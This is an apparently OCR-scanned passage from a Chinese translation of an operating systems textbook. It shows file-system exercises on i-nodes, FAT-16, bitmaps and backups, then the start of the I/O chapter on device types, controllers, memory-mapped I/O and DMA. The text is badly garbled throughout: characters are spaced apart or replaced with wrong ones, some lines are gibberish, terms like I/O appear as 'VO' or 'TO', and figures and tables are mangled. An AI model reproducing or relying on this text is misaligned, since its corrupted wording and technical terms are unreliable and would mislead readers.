现代 设备 的 名 字 ， 该 设备 需要 文件 存储 ， 并 且 对 文件 运用 连续 分 配 空 
间 的 方法 是 不 错 的 方法 。 


14.MS-DOS 如 何在 文件 中 实现 随机 访问 ? 


15. 考 虑 图 4-13 中 的 i 节 点 。 如 果 它 含有 用 4 个 字 节 表示 的 10 个 直接 
地 址 ， 而 且 所 有 的 磁盘 块 大 小 是 1024KB， 那 么 文件 最 大 可 能 有 多 大 ? 


16. 有 建议 说 ， 把 短文 件 的 数据 存在 i 市 点 之 内 会 提高 效率 并 且 市 省 
人 磁盘 空间 。 对 于 图 4-13 中 的 i 节点， 在 i 节 后 之 内 可 以 存放 多 少 字 市 的 数 
据 ? 


17. 两 个 计算 机 科学 系 的 学 生 Carolyn 和 Flinor 下 在 讨论 i 节点 。 
Carolyn 认 为 存储 看 容 量 越 来 越 大 ， 价 格 越 来 越 便宜 ， 所 以 当 打 开 文件 
时 ， 直 接 取 i 市 点 的 副本 ， 放 到 内 存 i 市 点 表 中 ， 建 立 一 个 新 i 入 点 将 更 
简单 、 更 快 ， 没 有 必要 搜索 整个 ji 节点 来 判断 它 是 否 已 经 存在 。Elinor 
则 不 同意 这 一 观点 。 他 们 两 个 人 谁 对 ? 


18. 说 明 硬 连接 优 于 符号 链接 的 一 个 优点 ， 并 说 明 符 号 链接 优 于 便 
EFA — “MIL ° 
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D 位 ， 一 个 磁 表 有 B 个 块 ， 其 中 有 F 个 空 则 。 在 什么 条 件 下 ， 空 闲 块 表 
采用 的 空间 少 于 位 图 ? 设 D 为 16 位 ， 请 计算 空闲 磁盘 空间 的 百分比 。 


20 一 个 空间 块 位 图 开始 时 和 磁盘 分 区 首次 初始 化 类 似 ， 比 如 : 
1000 0000 0000 0000 ( 首 块 被 根 目录 使 用 ) ， 系 统 总 是 从 最 小 编号 的 
盘 块 开始 寻找 空 几 块 ， 所 以 在 有 6 块 的 文件 A 写 入 之 后 ， 该 位 图 为 1111 
1110 0000 0000。 请 说 明 在 完成 如 下 每 一 个 附加 动作 之 后 位 图 的 状态 : 


a) 写 入 有 5 块 的 文件 B。 
b) 删 除 文件 A 。 
c 写 入 有 8 块 的 文件 C。 
d) 删 除 文件 B。 


21. 如 果 因 为 系统 月 省 而 使 存放 空 闪 磁盘 块 信息 的 空 内 块 表 或 位 图 
完全 丢失 ， 会 发 生 什 么 情况 ? 有 什么 办 法 从 这 个 灾难 中 恢复 吗 ， 还 是 
与 该 磁盘 彻底 再 见 ? 分 别 就 UNIX 和 FAT-16 文 件 系统 讨论 你 的 答案 。 


22.Oliver Owl 在 大 学 计算 中 心 的 工作 是 更 换 用 于 通宵 数据 备份 的 
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比 亚 戏剧 是 由 外 星 访客 写成 的 。 由 于 仅 有 一 个 系统 ， 所 以 只 能 在 正在 
做 备份 的 系统 上 运行 文本 编辑 程序 。 这 样 的 安排 有 什么 问题 吗 ? 


23. 在 教材 中 我 们 详细 讨论 过 增 量 转 储 。 在 Windows 中 很 容易 说 明 
何 时 要 转 储 一 个 文件 ， 因 为 每 个 文件 都 有 一 个 存档 位 。 在 UNIX 中 没有 
这 个 位 ， 那 么 UNIX 备 份 程序 怎样 知道 哪个 文件 需要 转 储 ? 


24. 假 设 图 4-25 中 的 文件 21 自 上 次 转 储 之 后 没有 修改 过 ， 在 什么 情 
况 下 图 4-26 中 的 四 张 位 图 会 不 同 ? 


25. 有 人 建议 每 个 UNIX 文 件 的 第 一 部 分 最 好 和 其 i 广 点 放 在 同一 个 
磁盘 块 中 ， 这 样 做 有 什么 好 处 ? 


26. 考 虑 图 4-27。 对 某 个 特殊 的 块 号 ,计数器 的 值 在 两 个 表 中 有 没 
有 可 能 都 是 数值 2? 这 个 问题 如 何 纠正 ? 


27. 文 件 系统 的 性 能 与 高 速 缓存 的 命中 率 有 很 大 的 关系 ( 即 在 高 速 
缓存 中 找到 所 需 块 的 概率 ) 。 从 高 速 缓存 中 读 取 数 据 需 要 lms， 而 从 
磁盘 上 读 取 需要 40ms， 若 命中 率 为 np， 给 出 读 取 数 据 所 需 平均 时 间 的 
计算 公式 。 并 画 出 h 从 0 到 1.0 变 化 时 的 函数 曲线 。 


28. 考 虑 几 4-21 背 后 的 思想 ， 目 前 磁 一 平均 寻 道 时 间 为 8ms， 旋 转 
速率 为 15 000rpm， 每 道 为 262 144 字 节 。 对 大 小 各 为 IKB、2KB 和 4KB 
的 磁盘 块 ， 传 送 速 率 各 是 多 少 ? 


29. 某 个 文件 系统 使 用 2KB 的 磁 副 块 ， 而 中 间 文 件 大 小 值 为 1KB。 
如 膝 所 有 的 文件 部 十 正好 1KB 大 ， 那 么 浪费 掉 的 人 ”c 副 空间 的 比例 是 多 
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请 说 明理 由 。 


30.MS-DOS 的 FAT-16 表 有 64K 个 表 项 ， 假 设 其 中 的 一 位 必须 用 于 
其 他 用 途 ， 这 样 该 表 就 只 有 32 768 个 表 项 了 。 如 果 没 有 其 他 修改 ， 在 
这 个 条 件 下 最 大 的 MS-DOS 文 件 有 和 多大? 


31.MS-DOS 中 的 文件 必须 在 内 存 中 的 FAT16 表 中 竞争 空间 。 如 果 
某 个 文件 使 用 了 k 个 表 项 ， 其 他 任何 文件 就 不 能 使 用 这 k 个 表 项 ， 这 样 
会 对 所 有 文件 的 总 长 度 带 来 什么 限制 ? 


32. 一 个 UNIX 系 统 使 用 1KB 人 磁盘 块 和 4 字 和 向 一 地 址 。 如 果 每 个 iT 
点 中 有 10 个 直接 表 项 以 及 一 个 一 次 间接 块 、 一 个 二 次 间接 块 和 一 个 三 
次 间接 块 ， 那 么 文件 的 最 大 尺寸 是 多 少 ? 


33. 对 于 文件 /usr/ast/courses/os/handout.t， 若 要 调 入 其 i 节点 需要 多 
少 个 人 磁盘 操作 ? 假设 其 根 目录 的 i 太 点 在 内 存 中 ， 其 他 路 径 都 不 在 内 存 
中 。 并 假设 所 有 的 目录 都 在 一 个 磁盘 块 中 。 


34. 在 许多 UNIX 系 统 中 ，i 点 存放 在 磁盘 的 开始 之 处 。 一 种 替代 
设计 方案 是 ， 在 文件 创建 时 分 配 iP 点 ， 并 把 i 和 点 存放 在 该 文件 首 个 
们 c 副 块 的 开始 之 处 。 请 讨论 这 个 方案 的 优 跌 点 。 
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文件 ， 并 保持 适当 的 效率 。 


36. 编 写 一 个 程序 ， 该 程序 从 给 定 的 目录 开始 ， 从 此 点 开始 沿 目录 
树 向 下 ， 记 录 所 找到 的 所 有 文件 的 大 小 。 在 完成 这 一 切 之 后 ， 该 程序 
应 该 打印 出 文件 大 小 分 布 的 直方 图 ， 以 该 直方 图 的 区 间 宽 度 为 参数 
(比如 ， 区 间 宽 度 为 1024， 那 么 大 小 为 0 一 1023 的 文件 同 在 一 个 区 间 帘 
度 ， 大 小 为 1024~2047 的 文件 同 在 下 一 个 区 间 宽 度 ， 如 此 类 推 ) 。 


37. 编 写 一 个 程序 ， 扫 描 UNIX 文 件 系 统 中 的 所 有 目 孙 ， 并 发 现 和 
定位 有 两 个 或 更 多 硬 连 接 计 数 的 iT 点 。 对 于 每 个 这 样 的 文件 ， 列 出 指 
癌 该 文件 的 所 有 文件 的 名 称 。 


38. 编 写 UNIX 的 新 版 Is 程 序 。 这 个 版 本 将 一 个 或 多 个 目录 名 作为 变 
量 ， 并 列 出 每 个 目录 中 所 有 的 文件 ， 一 个 文件 一 行 。 每 个 域 应 该 对 其 
类 型 进行 合理 的 格式 化 。 仅 列 出 第 一 个 磁盘 地 址 〈 若 该 地 址 存在 的 
i) è 


AS 输入 /输出 


除了 提供 抽象 (例如 ， 进 程 (和 线程 ，、 地 址 空间 和 文件 ) 以 外 ， 
操作 系统 还 要 控制 计算 机 的 所 有 LO (输入 /输出 ) 设备 。 操 作 系统 必 
须 向 设备 发 送 命令 ， 捕 捉 中 断 ， 并 处 理 设备 的 各 种 错误 。 它 还 应 该 在 
设备 和 系统 的 其 他 部 分 之 间 提 供 人 简单 且 易 于 使 用 的 接口 。 如 果 有 可 
能 ， 这 个 接口 对 于 所 有 设备 都 应 该 是 相同 的 ， 这 丈 是 所 谓 的 设备 无 天 
性 。LO 部 分 的 代码 是 整个 操作 系统 的 重要 组 成 部 分 。 操 作 系 统 如 何 管 
理 VO 是 本 章 的 主题 。 


本 章 的 内 容 是 这 样 组 织 的 : 首先 介绍 MO 硬件 的 基本 原理 ， 然 后 介 
绍 一 般 的 MO 软件 。IO 软 件 可 以 分 层 构造 ， 每 层 都 有 明确 的 任务 。 我 
们 将 对 这 些 软件 层 进 行 研 究 ， 看 一 看 它们 做 些 什 么 ， 以 及 如 何在 一 起 
配合 工作 。 


在 此 之 后 将 详细 介绍 几 种 IO 设备 : 磁 副 、 时 钟 、 键 盘 和 显示 大 。 
对 于 每 一 种 设备 我 们 都 将 从 硬件 和 软件 两 方面 加 以 介绍 。 最 后 ， 我 们 


还 将 介绍 电源 管理 。 


5.1 IO 硬件 原理 


不 同 的 人 对 于 IO 硬件 的 理解 是 不 同 的 。 对 于 电子 工程 师 而 言 ， 
IO 硬件 欧 是 必 片 、 导 线 、 电 源 、 电 机 和 其 他 组 成 硬件 的 物理 部 件 。 对 
程序 员 而 言 ， 则 只 注意 VO 硬件 提供 给 软件 的 接口 ， 如 硬件 能 够 接收 的 
命令 、 它 能 够 完成 的 功能 以 及 它 能 够 报告 的 错误 。 本 书 主 要 介绍 怎样 
对 IO 设备 编程 ， 而 不 是 如 何 设计 、 制 造 和 维护 硬件 ， 因 此 ， 我 们 的 讨 
论 限 于 如 何 对 硬件 编程 ， 而 不 是 其 内 部 的 工作 原理 。 然 而 ， 很 多 IO 设 
备 的 编程 和 党 与 其 内 部 操作 密切 相关 。 在 下 面 三 节 中 ， 我 们 将 介绍 与 
IO 硬件 编程 有 天 的 一 般 性 背景 知识 。 这 些 内 容 可 以 看 成 是 对 1.4 介 
绍 性 材料 的 复习 和 扩充 。 


5.1.1 IO 设备 


IO 设备 大 致 可 以 分 为 两 类 : 块 设备 (block device) 和 字符 设备 
(character device) 。 块 设备 把 信息 存储 在 固定 大 小 的 块 中 ， 每 个 块 有 
自己 的 地 址 。 通 常 块 的 大 小 在 512 字 节 至 32 768 字 节 之 间 。 所 有 传输 以 
一 个 或 多 个 完整 的 (连续 的 ， 块 为 单位 。 块 设备 的 基本 特征 是 每 个 块 
都 能 独立 于 其 他 块 而 读 写 。 硬 盘 、CD-ROM 和 USB 盘 是 最 常见 的 块 设 
备 。 

如 果 仔 细 观 察 ， 块 可 寻 址 的 设备 与 其 他 设备 之 间 并 没有 严格 的 界 


限 。 磁 盘 是 公认 的 块 可 寻 址 的 设备 ， 因 为 无 论 磁 副 辟 当前 处 于 什么 位 
置 ， 它 尽 古 能 够 寻 址 其 他 柱 面 并 且 等 得 所 需要 的 人 ”c 副 块 旋转 到 磁 尖 下 
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列 的 块 。 如 果 给 出 命令 让 们 c 市 机 读 第 N 块 ， 它 可 以 首先 癌 回 倒 带 ， 然 
后 再 前 进 直 到 第 N 块 。 该 操作 与 磁盘 的 寻 道 相 类 似 ， 只 是 伦 费 的 时 间 
更 长 。 不 过 ， 重 写 位 市 中 间 位 置 的 块 有 可 能 做 得 到 ， 也 有 可 能 做 不 

到 。 即 便 有 可 能 把 磁 融 当 作 随机 访问 的 块 设备 来 使 用 ， 也 是 有 些 勉 为 
其 难 的 ， 毕 竟 通 常 并 不 这 样 使 用 磁 市 。 


另 一 类 IO 设备 是 字符 设备 。 字 符 设 备 以 字符 为 单位 发 送 或 接收 一 
个 字符 流 ， 而 不 考虑 任何 块 结构 。 字 符 设 备 是 不 可 寻 址 的 ， 也 没有 任 
何 寻 道 操作 。 打 印 机 、 网 络 接口 、 鼠 标 (用 作 指 点 设备 ) 、 老 鼠 (用 
作 心 理学 实验 室 实验 ) ， 以 及 大 多 数 与 磁盘 不 同 的 设备 都 可 看 作 是 字 


符 设 备 。 


这 种 分 类 方法 并 不 完美 ， 有 些 设 备 束 没有 包括 进去 。 例 如 ， 时 钟 
既 不 是 块 可 寻 址 的 ， 也 不 产生 或 接收 字符 流 。 它 所 做 的 工作 就 是 按照 
预先 规定 好 的 时 间 间 隔 产 生 中 断 。 内 存 映射 的 显示 亏 也 不 适用 于 此 模 
型 。 但 是 ， 块 设备 和 字符 设备 的 模型 具有 足够 的 一 般 性 ， 可 以 用 作 使 
处 理 WO 设 备 的 某 些 操 作 系 统 软件 具有 设备 无 天性 的 基础 。 例 如 ， 文 件 
系统 只 处 理 抽 象 的 块 设备 ， 而 把 与 设备 相关 的 部 分 留 给 较 低层 的 软 
Hee 
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级 的 数据 率 下 保证 性 能 优 民 ， 给 软件 造成 了 相当 大 的 压力 。 图 5-1 列 出 


了 某 些 前 见 设备 的 数据 率 ， 这 些 设备 中 大 多 数 随 着 时 间 的 推移 而 变 得 
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数字 便携 式 摄 像 机 3.5 MB/s 
802.11g 无 线 网 络 6.75MB/s 
快速 以 太 网 12.5 MB/s 
“OMB 
«OMSL 
SONET OC-12 网 络 
SATA Wh Fi SKB) as 300MB/s 


5-1 某 些 典型 的 设备 、 网络 和 总 线 的 数据 率 


5.1.2 ”设备 控制 器 


1/O 设 备 一 般 由 机 械 部 件 和 电子 部 件 两 部 分 组 成 。 通 常 可 以 将 这 两 
部 分 分 开 处 理 ， 以 提供 更 加 模块 化 和 更 加 通用 的 设计 。 电 子 部 件 称 作 
设备 控制 器 (device controller) 或 适配器 (adapter) 。 在 个 人 计算 机 
上 ， 它 经 常 以 主板 上 的 芯片 的 形式 出 现 ， 或 者 以 插入 (PCI) 扩展 村 
中 的 印刷 电路 板 的 形式 出 现 。 机 械 部 件 则 是 设备 本 映 。 这 一 安排 如 图 


1-6 所 示 。 


控制 器 卡 上 通常 有 一 个 连接 器 ， 通 向 设备 本 号 的 电缆 可 以 插入 到 
这 个 连接 器 中 。 很 多 控制 器 可 以 操作 2 个 、4 个 甚至 8 个 相同 的 设备 。 如 
果 控 制 器 和 设备 之 间 采 用 的 是 标准 接口 ， 无 论 是 官方 的 ANSI、IEEE 或 
ISO 标准 还 是 事实 上 的 标准 ， 各 个 公司 都 可 以 制造 各 种 适合 这 个 接口 
的 控制 右 或 设备 。 例 如 ， 许 多 公司 都 生产 符合 IDE、SATIA、SCSI、 
USB 或 火线 (IEEE 1394) 接口 的 磁盘 驱动 器 。 


控制 器 与 设备 之 间 的 接口 通常 是 一 个 很 低层 次 的 接口 。 例 如 ， 磁 
盘 可 以 按 每 个 磁道 10 000 个 悄 区 ， 每 个 局 区 512 字 节 进 行 格式 化 。 然 
而 ， 实 际 从 驱动 器 出 来 的 却 是 一 个 串 行 的 位 (比特) 流 ， 它 以 一 个 前 
导 符 (preamble) 开始 ， 接 着 是 一 个 局 区 中 的 4096 位 ， 最 后 是 一 个 校 


验 和 ， 也 称 为 错误 校正 码 (Error-Correcting Code, ECC) 。 前 导 符 是 


FEM HE EIT SOY SS EAA, ETA KS se KK) 
以 及 类 似 的 数据 ， 此 外 还 包含 同步 信息 。 


控制 锅 的 任务 是 把 串 行 的 位 流转 换 为 字 节 块 ， 并 进行 必要 的 错误 
校正 工作 。 字 节 块 通 芝 首先 在 控制 夯 内 部 的 一 个 缓冲 区 中 按 位 进行 组 
装 ， 然 后 在 对 校 验 和 进行 校 验 并 证 明 字 下 块 没 有 错误 后 ， 再 将 它 复制 
HERS 


在 同样 低 的 层次 上 ， 监 视 需 的 控制 硕 也 是 一 个 位 串 行 设 备 。 它 从 
内 存 中 读 入 包含 待 显示 字符 的 字 和 节 ， 并 产生 用 来 调制 CRT 电 子 束 的 信 
号 ， 以 便 将 结果 写 到 屏幕 上 。 该 控制 右 还 产生 信号 使 CRT 电 子 束 在 完 
成 一 行 扫描 后 做 水 平 回 扫 ， 并 且 产 生 信和 号 使 CRT 电 子 束 在 整个 屏幕 扫 
描 结 束 后 做 垂直 回 扫 。 如 果 没 有 CRI 控 制 器 ， 那 么 操作 系统 程序 员 只 
能 对 显像管 的 模拟 扫 朱 直接 进行 编程 。 有 了 控制 戎 ， 操 作 系统 惑 可 以 
用 几 个 参数 (这 些 参数 包括 每 行 的 字符 数 或 像素 数 、 每 屏 的 行 数 等 ) 
对 其 初始 化 ， 并 让 控制 絮 实 际 驱动 电子 束 。 平 板 TFT 显 示 费 的 工作 原 
理 与 此 不 同 ， 但 是 也 同样 复杂 。 


5.1.3 内存 映 射 IO 


每 个 控制 器 有 几 个 寄存 器 用 来 与 CPU 进行 通信 。 通 过 写 入 这 些 寄 
存 吉 ， 操 作 系统 可 以 命令 设备 发 送 数据 、 接 收 数 据 、 开 局 或 天 财 ， 或 
者 执行 某 些 其 他 操作 。 通 过 读 取 这 些 寄存 器 ， 操 作 系统 可 以 了 解 设备 
的 状态 ， 是 否 准备 好 接收 一 个 新 的 命令 等 。 


除了 这 些 控制 寄存 器 以 外 ， 许 多 设备 还 有 一 个 操作 系统 可 以 读 写 
的 数据 缓冲 区 。 例 如 ， 在 屏幕 上 显示 像素 的 常规 方法 是 使 用 一 个 视频 
RAM， 这 一 RAM 基 本 上 只 是 一 个 数据 缓冲 区 ， 可 供 程序 或 操作 系统 写 
入 数据 。 


于 是 ， 问 题 就 出 现 了 : CPU 如 何 与 设备 的 控制 寄存 器 和 数据 缓冲 
区 进行 通信 ? 存在 两 个 可 选 的 方法 。 在 第 一 个 方法 中 ， 每 个 控制 寄存 
器 被 分 配 一 个 IO 端口 (VO port) 号 ， 这 是 一 个 8 位 或 16 位 的 整数 。 所 
有 IO 端口 形成 UO 端 口 空间 (VO port space) ， 并 且 受 到 保护 使 得 普通 
的 用 户 程序 不 能 对 其 进行 访问 (只 有 操作 系统 可 以 访问 ) 。 使 用 一 条 
特殊 的 IO 指令 ， 例 如 


IN REG, PORT 


CPU 可 以 读 取 控制 寄存 器 PORT 的 内 容 并 将 结果 存 入 到 CPU 寄存 器 
REG 中 。 类 似 地 ， 使 用 


OUT PORT, REG 


CPU 可 以 将 REG 的 内 容 写 入 到 控制 寄存 器 中 。 大 多 数 早期 计算 
机 ， 包 括 几 乎 所 有 大 型 主机 ， 如 IBM 360 及 其 所 有 后 续 机 型 ， 都 是 以 这 
种 方式 工作 的 。 


在 这 一 方案 中 ， 内 存 地 址 空间 和 I/O 地 址 空间 是 不 同 的 ， 如 图 5-2a 


BIAS ° Tas 


IN RO,4 


和 


MOV RO,4 


在 这 一 设计 中 完全 不 同 。 前 着 读 取 IO 问 口 4 的 内 容 并 将 其 存 入 
R0， 而 后 着 则 读 取 内 存 字 4 的 内 容 并 将 其 存 入 R0。 因 此 ， 这 些 例子 中 的 
4 引用 的 是 不 同 且 不 相关 的 地 址 至 间 。 


两 个 地 址 空间 -个 地 址 空间 两 个 地 址 空间 
OxFFFF... 内 存 


IO 端口 


0 EE 


a) b) c) 


图 5-2 a) 单 独 的 VO 和 内 存 空间 ; b) 内 存 映 射 /O; oO) 混合 方案 


第 二 个 方法 是 PDP-11 引 入 的 ， 它 将 所 有 控制 寄存 器 映射 到 内 存 空 

间 中 ， 如 图 5-2b 所 示 。 每 个 控制 寄存 器 被 分 配 惟一 的 一 个 内 存 地 址 ， 并 
且 不 会 有 内 存 被 分 配 这 一 地 址 。 这 样 的 系统 称 为 内 存 映射 IO 

(memory-mapped 1/0) 。 通 常 分 配给 控制 寄存 器 的 地 址 位 于 地 址 空间 
的 顶端 。 图 5-2c 所 示 是 一 种 混合 的 方案 ， 这 一 方案 具有 内 存 映射 UO 的 
数据 缓冲 区 ， 而 控制 寄存 器 则 有 具有 单独 的 VO 羔 口 。Pentium 处 理 右 使 用 
的 就 是 这 一 体系 结构 。 在 IBM PC 兼容 机 中 ， 除 了 0 到 64K-1 的 WO 端口 之 
外 ，640K 到 1M-1 的 地 址 保留 给 设备 的 数据 缓冲 区 。 


这 些 方案 是 怎样 工作 的 ? 在 各 种 情形 下 ， 当 CPU 想 要 读 入 一 个 字 
的 上 时候， 不 论 是 从 内 存 中 读 入 还 是 从 WO 端口 中 读 入 ， 它 都 要 将 需要 的 
地 址 放 到 总 线 的 地 址 线 上 ， 然 后 在 总 线 的 一 条 控制 线 上 置 起 一 个 READ 
信号 。 还 要 用 到 第 二 条 信和 号 线 来 表明 需要 的 是 MO 空间 还 是 内 存 空间 。 
如 琳 是 内 存 空间 ， 内 存 将 啊 应 请 求 。 如 末 十 WO 空间 ，1/O 设 备 将 啊 应 请 


求 。 如 果 只 有 内 存 空间 (如 图 5-2b 所 示 的 情形 ) ， 那 么 每 个 内 存 模块 和 
每 个 IO 设备 都 会 将 地 址 线 和 它 所 服务 的 地 址 范围 进行 比较 ， 如 生地 址 
沙 在 这 一 范围 之 内 ， 它 就 会 啊 应 请 求 。 因 为 绝对 不 会 有 地 址 既 分 配给 
内 存 勾 分 配给 WO 设备 ， 所 以 不 会 存在 收 义 和 冲突 。 


这 两 种 寻 址 控制 俗 的 方案 具有 不 同 的 优 和 缺点。 我 们 首先 来 看 一 看 
内 存 映 射 TO 的 优点 。 第 一 ， 如 有 果 需 要 特殊 的 MO 指令 读 写 设备 控制 寄存 
器 ， 那 么 访问 这 些 寄 存 器 需要 使 用 汇编 代码 ， 因 为 在 C 或 C++ 中 不 存在 
执行 IN 或 OUT 指 令 的 方法 。 调 用 这 样 的 过 程 增加 了 控制 VO 的 开销 。 相 
反 ， 对 于 内 存 映射 WO， 设备 控制 寄存 右 只 十 内 存 中 的 变量 ， 在 C 语 襄 
中 可 以 和 任何 其 他 变量 一 样 寻 址 。 因 此 ， 对 于 内 存 上 映射/O，LO 设 备 驱 
动 程序 可 以 完全 用 C 语 言 编 写 。 如 果 不 使 用 内 存 映射 IO， 就 要 用 到 蘑 
些 和 汇编 代码 。 


第 二 ， 对 于 内 存 映射 TO， 不 需要 特殊 的 保护 机 制 来 阻止 用 户 进程 
执行 WO 操作 。 操 作 系 统 必 须要 做 的 全 部 事情 只 是 避免 把 包含 控制 寄存 
器 的 那 部 分 地 址 空间 放 入 任何 用 户 的 虚拟 地 址 空间 之 中 。 更 为 有 利 的 
征 ， 如 果 每 个 设备 在 地 址 空间 的 不 同 页 面 上 拥有 目 己 的 控制 寄存 胡 ， 
操作 系统 只 要 简单 地 通过 在 其 页 表 中 包含 期 望 的 页 面 就 可 以 让 用 户 控 
制 特定 的 设备 而 不 是 其 他 设备 。 这 样 的 方案 可 以 使 不 同 的 设备 驱动 程 
序 放置 在 不 同 的 地 址 空间 中 ， 不 但 可 以 减 小 内 核 的 大 小 ， 而 且 可 以 防 
止 驱 动 程序 之 间 相 互 干 扰 。 


第 三 ， 对 于 内 存 映 出 17O， 可 以 引用 内 存 的 每 一 条 指令 也 可 以 引用 
控制 寄存 禹 。 例 如 ， 如 条 存在 一 条 指令 TEST 可 以 测试 一 个 内 存 字 和 是否 
为 0， 那 么 它 也 可 以 用 来 测试 一 个 控制 寄存 器 十 人 否 为 0， 控 制 寄 存 右 为 0 
可 以 作为 信号 ， 表 明 设 备 空 有 并 且 可 以 接收 一 条 新 的 命令 。 汇 编 语言 
代码 可 能 是 这 样 的 : 


LOOP: TEST PORT_4// 检 测 端口 4 是 否 为 0 
BEQ READY// 如 果 为 0， 转 向 READY 
BRANCH LOOP// 否 则 ， 继 续 测试 

READY: 


WAR AN EA ER ATVO, BLA AUTRES til Bt ae SE ACPU, A 
后 再 测试 ， 这 样 束 需要 两 条 指令 而 不 古 一 条 。 在 上 面 给 出 的 循环 的 情 
形 中 ， 束 必须 加 上 第 四 条 指令 ， 这 样 会 稍稍 降低 检测 至 朵 设备 的 啊 应 
BE o 


在 计算 机 设计 中 ， 实 际 上 任何 事情 都 要 涉及 权衡 ， 此 处 也 不 例 
外 。 内 存 映 射 TO 也 有 缺点 。 首 先 ， 现 今 大 多 数 计 算 机 都 拥有 某 种 形式 
的 内 存 字 高 速 缓存 。 对 一 个 设备 控制 寄存 器 进行 高 速 缓存 可 能 是 灾难 
性 的 。 在 存在 高 速 缓存 的 情况 下 考虑 上 面 给 出 的 汇编 代码 循环 。 第 一 
次 引用 PORT 4 将 导致 它 被 高 速 缓存 ， 随 后 的 引用 将 只 从 高 速 缓存 中 取 
值 并 且 不 会 再 查询 设备 。 之 后 当 设备 最 终 变 为 就 绪 时 ， 软 件 将 没有 办 
法 发 现 这 一 点 。 结 末 ， 循 环 将 永远 进行 下 去 。 


对 内 存 映射 /O， 为 了 避免 这 一 情形 ， 便 件 必须 针对 每 个 页 面具 备 
选择 性 禁用 高 速 缓存 的 能 力 。 操 作 系 统 必须 管理 选择 性 高 速 绥 存 ， 所 
以 这 一 特性 为 硬件 和 操作 系统 两 着 增添 了 额外 的 复杂 性 。 


其 次 ， 如 果 只 存在 一 个 地 址 空间 ， 那 么 所 有 的 内 存 模块 和 所 有 的 
IO 设备 都 必须 检查 所 有 的 内 存 引 用 ， 以 便 了 解 由 谁 做 出 啊 应 。 如 采 计 
算 机 具有 单一 总 线 ， 如 图 5-3a 所 示 ， 那 么 让 每 个 内 存 模块 和 1/O 设 备查 
看 每 个 地 址 是 人 简单 易 行 的 。 


CPU 读 写 内 存 
转 到 该 高 带宽 总 线 


该 内 存 端口 允许 


ee ar’ Re l 
总 线 IO 设备 访问 内 存 


址 走向 此 处 
a) b) 


图 5-3 ) 单 总 线 体系 结构 :，b) 双 总 线 内 存 体系 结构 


然而 ， 现 代 个 人 计算 机 的 趋势 是 包含 专用 的 高 速 内 存 总 线 ， 如 图 5- 
3b 所 示 。 顺 便 提 一 句 ， 在 大 型 机 中 也 可 以 发 现 这 一 特性 。 装 备 这 一 总 
线 是 为 了 优化 内 存 性 能 ， 而 不 是 为 了 慢 速 的 VO 设备 而 做 的 折 中 。 
Pentium EZH NA ZPA (NF ` PCI ` SCSI ` USB ` ISA) , 
如 图 1-12 所 示 。 


TEN AR Dla EA AA A eV OWN BB I) 
法 查看 内 存 地 址 ， 因 为 内 存 地 址 旁 路 到 内 存 总 线 上 ， 所 以 没有 办 法 啊 
应 。 此 外 ， 必 须 采 取 特 殊 的 措施 使 内 存 映 射 TO 工 作 在 具有 多 总 线 的 系 
统 上 。 一 种 可 能 的 方法 是 首先 将 全 部 内 存 引 用 发 送 到 内 存 ， 如 果 内 存 
响应 失败 ，CPU 将 尝试 其 他 总 线 。 这 一 设计 是 可 以 工作 的 ， 但 是 需要 
额外 的 硬件 复杂 性 。 


第 二 种 可 能 的 设计 是 在 内 存 总 线 上 放置 一 个 探 碍 设备 ， 放 过 所 有 
潜在 地 指向 所 关注 的 VO 设备 的 地 址 。 此 处 的 问题 是 ，L/O 设 备 可 能 无 法 
以 内 存 所 能 达到 的 速度 处 理 请 求 。 


第 三 种 可 能 的 设计 是 在 PCI 桥 心 片 中 对 地 址 进行 过 滤 ， 这 正 生 网 1- 
12 中 Pentium 结 构 上 所 使 用 的 。 该 改 片 中 包含 耕 干 个 在 引导 时 预收 载 的 
范围 寄存 器 。 例 如 ，640K 到 1M-1 可 能 被 标记 为 非 内 存 范围 。 落 在 标记 
为 非 内 存 的 那些 纯 围 之 内 的 地 址 将 被 转发 给 PCI 总 线 而 不 是 内 存 。 这 一 
设计 的 缺点 是 需要 在 引导 时 判定 哪些 内 存 地址 不 是 真正 的 内 存 地 址 。 
因而 ， 每 一 设计 部 有 文 持 它 和 反对 它 的 论据 ， 所 以 折 中 和 权衡 是 不 可 
避免 的 。 


5.1.4 HITAITA 


无 论 一 个 CPU 是 否 具有 内 存 映 射 /O， 它 都 需要 寻 址 设备 控制 器 以 

便 与 它们 交换 数据 。CPU 可 以 从 MO 控制 器 每 次 请 求 一 个 字 节 的 数据 ， 
但 是 这 样 做 浪费 CPU 的 时 间 ， 所 以 经 常用 到 一 种 称 为 直接 存储 器 存 取 

(Direct Memory Access, DMA) 的 不 同方 案 。 只 有 硬件 具有 DMA 控 
制 器 时 操作 系统 才能 使 用 DMA， 而 大 多 数 系统 都 有 DMA 控 制 器 。 有 了 时 
DMA 控 制 絮 集成 到 磁盘 控制 器 和 其 他 控制 絮 之 中 ， 但 是 这 样 的 设计 要 
求 每 个 设备 有 一 个 单独 的 DMA 控 制作。 更 加 普 裔 的 是 ， 只 有 一 个 DMA 
控制 器 可 利用 (例如 ,在 主板 上 ) ， 由 它 调控 到 多 个 设备 的 数据 传送 ， 
而 这 些 数据 传送 经 常 是 同时 发 生 的 。 


无 论 DMA 控 制 器 在 物理 上 处 于 什么 地 方 ， 它 都 能 够 独立 于 CPU 而 
访问 系统 总 线 ， 如 图 5-4 所 示 。 它 包 全 大 干 个 可 以 被 CPU 读 写 的 寄存 
大 ， 其 中 包括 一 个 内 存 地 址 寄存 器 、 一 个 字 让 计数 寄存 右 和 一 个 或 多 
个 控制 寄存 器 。 控 制 寄存 器 指定 要 使 用 的 WO 端口 、 传 送 方向 〈 从 IO 设 
备 读 或 写 到 MO 设备 ) 、 传 送 单位 (每 次 一 个 字 市 或 每 次 一 个 字 ) 以 及 
ERR ARIS FBR KI TB 
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图 5-4 DMA 传 送 操作 


为 了 解释 DMA 的 工作 原理 ， 让 我 们 自 先 看 一 下 没有 使 用 DMA 时 人 磁 
盘 如 何 读 。 下 和 完 ， 探 制 旧 从 位 副 转 动 右 串 行 地 、 一 位 一 位 地 读 一 个 块 
(一 个 或 多 个 局 区 ) ， 直 到 将 整 块 信息 放 入 控制 器 的 内 部 缓冲 区 中 。 
接着 ， 它 计算 校 验 和 ， 以 保证 没有 读 错 误 发 生 。 然 后 控制 器 产生 一 个 
中 断 。 当 操作 系统 开始 运行 时 ， 它 重复 地 从 控制 器 的 缓冲 区 中 一 次 一 
个 字 市 或 一 个 字 地 读 取 该 块 的 信息 ， 并 将 其 存 入 内 存 中 。 


使 用 DMA 了 时， 过 程 是 不 同 的 。 表 和 完 ，CPU 通 过 设置 DMA 控 制 右 的 
